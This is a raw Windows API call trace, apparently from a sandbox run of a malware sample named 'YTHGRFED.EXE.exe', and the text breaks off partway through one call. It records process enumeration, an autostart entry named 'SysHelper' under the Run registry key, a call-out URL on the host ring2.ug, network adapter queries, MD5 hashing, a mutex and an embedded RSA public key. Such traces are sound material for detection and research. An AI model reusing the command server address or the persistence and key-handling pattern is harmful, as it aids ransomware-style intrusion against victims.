[0195.413] CloseHandle (hObject=0x0) returned 0 [0195.413] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0195.413] CloseHandle (hObject=0x0) returned 0 [0195.413] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0 [0195.413] CloseHandle (hObject=0x0) returned 0 [0195.413] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0195.413] CloseHandle (hObject=0x0) returned 0 [0195.413] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0195.413] CloseHandle (hObject=0x0) returned 0 [0195.413] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0195.413] CloseHandle (hObject=0x0) returned 0 [0195.413] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x33c) returned 0x0 [0195.414] CloseHandle (hObject=0x0) returned 0 [0195.414] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x374) returned 0x0 [0195.414] CloseHandle (hObject=0x0) returned 0 [0195.414] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3b0) returned 0x0 [0195.414] CloseHandle (hObject=0x0) returned 0 [0195.414] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x64) returned 0x0 [0195.414] CloseHandle (hObject=0x0) returned 0 [0195.414] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x0 [0195.414] CloseHandle (hObject=0x0) returned 0 [0195.414] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x450) returned 0x0 [0195.414] CloseHandle (hObject=0x0) returned 0 [0195.414] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x45c) returned 0x5b0 [0195.414] EnumProcessModules (in: hProcess=0x5b0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 0 [0195.415] CloseHandle (hObject=0x5b0) returned 1 [0195.415] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x474) returned 0x5b0 [0195.415] EnumProcessModules (in: hProcess=0x5b0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 0 [0195.415] CloseHandle (hObject=0x5b0) returned 1 [0195.415] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x488) returned 0x5b0 [0195.415] EnumProcessModules (in: hProcess=0x5b0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 0 [0195.415] CloseHandle (hObject=0x5b0) returned 1 [0195.415] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4a0) returned 0x5b0 [0195.415] EnumProcessModules (in: hProcess=0x5b0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 0 [0195.416] CloseHandle (hObject=0x5b0) returned 1 [0195.416] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4a8) returned 0x0 [0195.416] CloseHandle (hObject=0x0) returned 0 [0195.416] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x53c) returned 0x5b0 [0195.416] EnumProcessModules (in: hProcess=0x5b0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0195.417] GetModuleBaseNameW (in: hProcess=0x5b0, hModule=0x400000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="YTHGRFED.EXE.exe") returned 0x10 [0195.418] CloseHandle (hObject=0x5b0) returned 1 [0195.418] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5c0) returned 0x5b0 [0195.418] EnumProcessModules (in: hProcess=0x5b0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0195.419] GetModuleBaseNameW (in: hProcess=0x5b0, hModule=0x400000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="reader_sl.exe") returned 0xd [0195.420] CloseHandle (hObject=0x5b0) returned 1 [0195.420] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e4) returned 0x5b0 [0195.420] EnumProcessModules (in: hProcess=0x5b0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 0 [0195.420] CloseHandle (hObject=0x5b0) returned 1 [0195.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x28) returned 0x649ff0 [0195.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33cfb28 [0195.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33c2c80 [0195.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d69c8 [0195.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d11e0 [0195.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33e20f0 [0195.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33e2358 [0195.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33e25c0 [0195.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33e2828 [0195.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33e2a90 [0195.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33e2cf8 [0195.437] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18df60 | out: phkResult=0x18df60*=0x5b0) returned 0x0 [0195.437] RegQueryValueExW (in: hKey=0x5b0, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18df5c, lpData=0x18c688, lpcbData=0x18df40*=0x400 | out: lpType=0x18df5c*=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe\" --AutoStart", lpcbData=0x18df40*=0xe0) returned 0x0 [0195.438] RegCloseKey (hKey=0x5b0) returned 0x0 [0195.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x33fd5c8 [0195.438] lstrlenA (lpString="\" --AutoStart") returned 13 [0195.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd0) returned 0x3396d60 [0195.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd5c8 | out: hHeap=0x620000) returned 1 [0195.438] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe") returned 1 [0195.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd0) returned 0x3396e38 [0195.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3396d60 | out: hHeap=0x620000) returned 1 [0195.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x28) returned 0x33f7da8 [0195.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33e2f60 [0195.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33e31c8 [0195.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33e3430 [0195.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33e3698 [0195.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33e3900 [0195.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d8db0 [0195.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d15e0 [0195.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d1848 [0195.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d1ab0 [0195.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d1d18 [0195.439] lstrlenA (lpString="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned 51 [0195.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x68) returned 0x674fd0 [0195.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e2f60, cbMultiByte=-1, lpWideCharStr=0x674fd0, cchWideChar=52 | out: lpWideCharStr="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned 52 [0195.439] lstrcatW (in: lpString1="", lpString2="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php" [0195.439] lstrlenA (lpString="") returned 0 [0195.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x3373428 [0195.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e31c8, cbMultiByte=-1, lpWideCharStr=0x3373428, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0195.439] lstrcatW (in: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php", lpString2="" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php" [0195.439] lstrlenA (lpString="") returned 0 [0195.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x3373448 [0195.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e3430, cbMultiByte=-1, lpWideCharStr=0x3373448, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0195.439] lstrcatW (in: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php", lpString2="" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php" [0195.439] lstrlenA (lpString="") returned 0 [0195.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x3373418 [0195.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e3698, cbMultiByte=-1, lpWideCharStr=0x3373418, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0195.439] lstrcatW (in: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php", lpString2="" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php" [0195.439] lstrlenA (lpString="") returned 0 [0195.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x33734b8 [0195.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e3900, cbMultiByte=-1, lpWideCharStr=0x33734b8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0195.440] lstrcatW (in: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php", lpString2="" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php" [0195.440] lstrlenA (lpString="") returned 0 [0195.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x3373438 [0195.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33d8db0, cbMultiByte=-1, lpWideCharStr=0x3373438, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0195.440] lstrcatW (in: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php", lpString2="" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php" [0195.440] lstrlenA (lpString="") returned 0 [0195.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x3373468 [0195.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33d15e0, cbMultiByte=-1, lpWideCharStr=0x3373468, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0195.440] lstrcatW (in: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php", lpString2="" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php" [0195.440] lstrlenA (lpString="") returned 0 [0195.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x3373478 [0195.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33d1848, cbMultiByte=-1, lpWideCharStr=0x3373478, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0195.440] lstrcatW (in: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php", lpString2="" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php" [0195.440] lstrlenA (lpString="") returned 0 [0195.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x33734d8 [0195.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33d1ab0, cbMultiByte=-1, lpWideCharStr=0x33734d8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0195.440] lstrcatW (in: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php", lpString2="" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php" [0195.440] lstrlenA (lpString="") returned 0 [0195.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x3373488 [0195.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33d1d18, cbMultiByte=-1, lpWideCharStr=0x3373488, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0195.440] lstrcatW (in: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php", lpString2="" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php" [0195.440] lstrlenW (lpString="") returned 0 [0195.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12) returned 0x643020 [0195.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x288) returned 0x33d9018 [0195.440] GetAdaptersInfo (in: AdapterInfo=0x33d9018, SizePointer=0x18df24 | out: AdapterInfo=0x33d9018, SizePointer=0x18df24) returned 0x0 [0195.459] GetAdaptersInfo (in: AdapterInfo=0x33d9018, SizePointer=0x18df24 | out: AdapterInfo=0x33d9018, SizePointer=0x18df24) returned 0x0 [0195.470] GetLastError () returned 0x0 [0195.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1000) returned 0x340afe8 [0195.487] GetLastError () returned 0x0 [0195.504] GetLastError () returned 0x0 [0195.516] CryptAcquireContextW (in: phProv=0x18def4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18def4*=0x679450) returned 1 [0195.561] CryptCreateHash (in: hProv=0x679450, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18defc | out: phHash=0x18defc) returned 1 [0195.561] CryptHashData (hHash=0x6644c0, pbData=0x33fc640, dwDataLen=0x11, dwFlags=0x0) returned 1 [0195.561] CryptGetHashParam (in: hHash=0x6644c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x18def8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18def8) returned 1 [0195.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x643060 [0195.561] CryptGetHashParam (in: hHash=0x6644c0, dwParam=0x2, pbData=0x643060, pdwDataLen=0x18def8, dwFlags=0x0 | out: pbData=0x643060, pdwDataLen=0x18def8) returned 1 [0195.561] GetLastError () returned 0x0 [0195.561] CryptDestroyHash (hHash=0x6644c0) returned 1 [0195.561] CryptReleaseContext (hProv=0x679450, dwFlags=0x0) returned 1 [0195.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fc640 | out: hHeap=0x620000) returned 1 [0195.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1568 [0195.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x690248 | out: hHeap=0x620000) returned 1 [0195.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64d3e0 | out: hHeap=0x620000) returned 1 [0195.561] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0x318) returned 0x5bc [0195.860] WaitForSingleObject (hHandle=0x5bc, dwMilliseconds=0xffffffff) returned 0x0 [0226.102] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}") returned 0x5d0 [0226.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x28) returned 0x33f7f58 [0226.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33e9dd8 [0226.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33ea040 [0226.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33ea2a8 [0226.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33ea510 [0226.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33ea778 [0226.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33ea9e0 [0226.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33eac48 [0226.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33eaeb0 [0226.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33eb118 [0226.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33eb380 [0226.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3b0) returned 0x68b698 [0226.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5d5) returned 0x695e90 [0226.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----", cchWideChar=-1, lpMultiByteStr=0x695e90, cbMultiByte=1493, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----", lpUsedDefaultChar=0x0) returned 470 [0226.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e0) returned 0x692260 [0226.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x695e90 | out: hHeap=0x620000) returned 1 [0226.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68b698 | out: hHeap=0x620000) returned 1 [0226.114] CryptAcquireContextW (in: phProv=0x18df64, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18df64*=0x6794d8) returned 1 [0226.145] CryptCreateHash (in: hProv=0x6794d8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18df68 | out: phHash=0x18df68) returned 1 [0226.145] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0226.145] CryptHashData (hHash=0x33f0348, pbData=0x692260, dwDataLen=0x1d5, dwFlags=0x0) returned 1 [0226.146] CryptGetHashParam (in: hHash=0x33f0348, dwParam=0x2, pbData=0x0, pdwDataLen=0x18df6c, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18df6c) returned 1 [0226.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c8600 [0226.146] CryptGetHashParam (in: hHash=0x33f0348, dwParam=0x2, pbData=0x33c8600, pdwDataLen=0x18df6c, dwFlags=0x0 | out: pbData=0x33c8600, pdwDataLen=0x18df6c) returned 1 [0226.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x34) returned 0x33f02c8 [0226.151] GetLastError () returned 0x0 [0226.157] lstrcatA (in: lpString1="", lpString2="2F" | out: lpString1="2F") returned="2F" [0226.157] GetLastError () returned 0x0 [0226.157] lstrcatA (in: lpString1="2F", lpString2="77" | out: lpString1="2F77") returned="2F77" [0226.157] GetLastError () returned 0x0 [0226.158] lstrcatA (in: lpString1="2F77", lpString2="B9" | out: lpString1="2F77B9") returned="2F77B9" [0226.158] GetLastError () returned 0x0 [0226.158] lstrcatA (in: lpString1="2F77B9", lpString2="5C" | out: lpString1="2F77B95C") returned="2F77B95C" [0226.158] GetLastError () returned 0x0 [0226.158] lstrcatA (in: lpString1="2F77B95C", lpString2="FC" | out: lpString1="2F77B95CFC") returned="2F77B95CFC" [0226.158] GetLastError () returned 0x0 [0226.158] lstrcatA (in: lpString1="2F77B95CFC", lpString2="3C" | out: lpString1="2F77B95CFC3C") returned="2F77B95CFC3C" [0226.158] GetLastError () returned 0x0 [0226.158] lstrcatA (in: lpString1="2F77B95CFC3C", lpString2="CD" | out: lpString1="2F77B95CFC3CCD") returned="2F77B95CFC3CCD" [0226.158] GetLastError () returned 0x0 [0226.158] lstrcatA (in: lpString1="2F77B95CFC3CCD", lpString2="A6" | out: lpString1="2F77B95CFC3CCDA6") returned="2F77B95CFC3CCDA6" [0226.158] GetLastError () returned 0x0 [0226.158] lstrcatA (in: lpString1="2F77B95CFC3CCDA6", lpString2="35" | out: lpString1="2F77B95CFC3CCDA635") returned="2F77B95CFC3CCDA635" [0226.158] GetLastError () returned 0x0 [0226.158] lstrcatA (in: lpString1="2F77B95CFC3CCDA635", lpString2="6D" | out: lpString1="2F77B95CFC3CCDA6356D") returned="2F77B95CFC3CCDA6356D" [0226.158] GetLastError () returned 0x0 [0226.158] lstrcatA (in: lpString1="2F77B95CFC3CCDA6356D", lpString2="76" | out: lpString1="2F77B95CFC3CCDA6356D76") returned="2F77B95CFC3CCDA6356D76" [0226.158] GetLastError () returned 0x0 [0226.158] lstrcatA (in: lpString1="2F77B95CFC3CCDA6356D76", lpString2="F7" | out: lpString1="2F77B95CFC3CCDA6356D76F7") returned="2F77B95CFC3CCDA6356D76F7" [0226.158] GetLastError () returned 0x0 [0226.158] lstrcatA (in: lpString1="2F77B95CFC3CCDA6356D76F7", lpString2="06" | out: lpString1="2F77B95CFC3CCDA6356D76F706") returned="2F77B95CFC3CCDA6356D76F706" [0226.158] GetLastError () returned 0x0 [0226.158] lstrcatA (in: lpString1="2F77B95CFC3CCDA6356D76F706", lpString2="A6" | out: lpString1="2F77B95CFC3CCDA6356D76F706A6") returned="2F77B95CFC3CCDA6356D76F706A6" [0226.158] GetLastError () returned 0x0 [0226.158] lstrcatA (in: lpString1="2F77B95CFC3CCDA6356D76F706A6", lpString2="AF" | out: lpString1="2F77B95CFC3CCDA6356D76F706A6AF") returned="2F77B95CFC3CCDA6356D76F706A6AF" [0226.158] GetLastError () returned 0x0 [0226.158] lstrcatA (in: lpString1="2F77B95CFC3CCDA6356D76F706A6AF", lpString2="6F" | out: lpString1="2F77B95CFC3CCDA6356D76F706A6AF6F") returned="2F77B95CFC3CCDA6356D76F706A6AF6F" [0226.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8600 | out: hHeap=0x620000) returned 1 [0226.159] CryptDestroyHash (hHash=0x33f0348) returned 1 [0226.159] CryptReleaseContext (hProv=0x6794d8, dwFlags=0x0) returned 1 [0226.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x692260 | out: hHeap=0x620000) returned 1 [0226.159] lstrlenA (lpString="2F77B95CFC3CCDA6356D76F706A6AF6F") returned 32 [0226.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3b0) returned 0x33f15c8 [0226.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5d5) returned 0x68b698 [0226.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----", cchWideChar=-1, lpMultiByteStr=0x68b698, cbMultiByte=1493, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC 